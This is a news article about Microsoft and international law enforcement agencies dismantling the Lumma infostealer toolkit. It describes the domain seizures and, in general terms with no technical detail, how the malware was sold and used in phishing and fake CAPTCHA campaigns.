Microsoft and Global Agencies Dismantle Ransomware Tool ‘Lumma’ in Major Cybercrime Crackdown

In an international crackdown on cybercrime, Microsoft has joined forces with global law enforcement agencies to dismantle Lumma, a notorious hacking toolkit linked to password theft, ransomware attacks, and cryptocurrency heists. The operation, led by Microsoft’s Digital Crimes Unit (DCU) alongside Europol, the U.S. Justice Department, and Japan’s Cybercrime Control Center, has resulted in the seizure of approximately 2,300 domains central to Lumma’s infrastructure.

Lumma, which first emerged on Russian-speaking dark web markets in 2022, offered hackers a modular, customizable malware package priced between $250 and $20,000, according to cybersecurity firm ESET LLC. Its versatility and ease of use made it a commodity malware of choice for cybercriminals seeking to tailor their attacks with add-on tools and manage stolen data via online dashboards.

A Global Dragnet on the Dark Web

The takedown comes amid a growing surge in ransomware attacks, which have reportedly risen by 300% over the past decade, according to Microsoft. In a blog post, Steven Masada, Assistant General Counsel at Microsoft’s DCU, described Lumma as a powerful enabler for hackers, capable of facilitating identity theft, brand impersonation, and large-scale data breaches.

Microsoft revealed that nearly 400,000 Windows machines worldwide had been infected with Lumma in the past two months alone. The malware was implicated in a number of high-profile cyber incidents, including the 2023 breach of Schneider Electric SE, and a spoofing campaign targeting CrowdStrike Holdings Inc., which distributed malware disguised as a cleanup tool following CrowdStrike’s own software update mishap.

From Booking.com Scams to Fake CAPTCHA Traps

The Lumma tool’s flexibility allowed attackers to mimic reputable brands, luring victims into clicking malicious links. One campaign impersonated Booking.com, sending fraudulent messages that led recipients to download malware under the guise of legitimate travel confirmations.

In more technical exploits, Lumma leveraged fake CAPTCHA verification pages to prompt users into executing commands that would install malicious code. This blend of social engineering and technical deception made it especially dangerous to both individuals and enterprise systems.

Global Enforcement Tightens Its Grip

The crackdown on Lumma is part of a wider pattern of aggressive international efforts to dismantle dark web cybercrime infrastructure. In April, more than 30 DDoS-for-hire websites were shut down, and earlier this year Europol led the takedown of Cracked and Nulled, two prominent marketplaces with over 10 million users, where cyber tools and stolen data were bought and sold.

The Justice Department has also been targeting underground markets where malware like Lumma is sold, while Europol and Japanese authorities have moved to isolate and neutralize associated threat actors.

An Ongoing Battle

Although Microsoft and its partners have scored a major victory with the Lumma takedown, the war against ransomware and dark web-enabled attacks is far from over. As Masada noted, efforts to block the use of these tools in brand impersonation and financial fraud remain a top priority.

The tech giant’s collaborative effort signals a growing recognition that cross-border cybercrime requires cross-border solutions—and that the tech industry has a pivotal role to play in safeguarding users from the evolving threat landscape.

Photo Credit: DepositPhotos.com